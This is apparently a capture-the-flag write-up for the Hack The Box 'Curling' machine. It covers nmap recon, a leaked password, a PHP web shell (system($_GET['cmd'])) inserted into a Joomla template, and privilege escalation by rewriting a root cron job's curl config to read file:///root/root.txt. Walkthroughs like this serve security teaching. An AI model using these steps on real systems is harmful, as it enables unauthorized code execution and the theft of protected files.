Curling
Easy - Linux
Recon
# Nmap 7.92 scan initiated Thu Dec 22 23:44:41 2022 as: nmap -p22,80 -sC -sV -oN /home/ventus/htb/labs/Curling/nmap.txt 10.10.10.150
Nmap scan report for 10.10.10.150
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 22 23:44:55 2022 -- 1 IP address (1 host up) scanned in 14.16 secondsLogging into the web service, we can see it is a Joomla instance. Enumerating the version, I couldn't find any particular exploits that worked, moving on. We can see a few posts on the home page, although one is signatured by Floris.
Getting RCE & Lateral Movement
Viewing the home page source, there's an HTML comment with the content: secret.txt. Navigating to that gives us a password, and logging into floris gives us the Super User account, but no ssh yet. Let's get RCE first. Inserting a simple system($_GET["cmd"]) into the template's error.php gave us command execution as www-data. That's a start. Let's try to view floris' directory. password_backup is readable, seems to be a hexdump of something. I'll exfil that to my attacking machine, run xxd -r to revert it back to its original form, and run file to identify what it is. It's a bzip compressed archive, let's run bunzip2. Another archive. It turned out to be multiple forms of archives, but finally we get a password.txt which we could use to login to floris through SSH.
Privilege Escalation
In floris' home directory, there's an interesting subdir named admin-area with two files: input and report. The contents of input were odd, but corellated with the contents of report:
url = 'http://127.0.0.1'<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://127.0.0.1/" />
<meta name="description" content="best curling site on the planet!" />
<meta name="generator" content="Joomla! - Open Source Content Management" />
<title>Home</title>
<link href="/index.php?format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...To learn more about the situation, I ran pspy to view possible cron jobs running periodically.
2022/12/23 06:34:01 CMD: UID=0 PID=14413 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2022/12/23 06:34:01 CMD: UID=0 PID=14412 | sleep 1
2022/12/23 06:34:01 CMD: UID=0 PID=14411 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2022/12/23 06:34:01 CMD: UID=0 PID=14410 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/reportThere was indeed a cron job calling curl with the -K flag pointing to the input file and outputting it to record. Viewing the man page for curl, we can find the -K flag is taking curl arguments from a file. I first thought we might be able to insert a malicious argument, but then remembered to keep it simple. Let's try to alter the url to the root flag instead:
url = "file:///root/root.txt"Sure enough, the root flag appeared in report. Another one done!
Last updated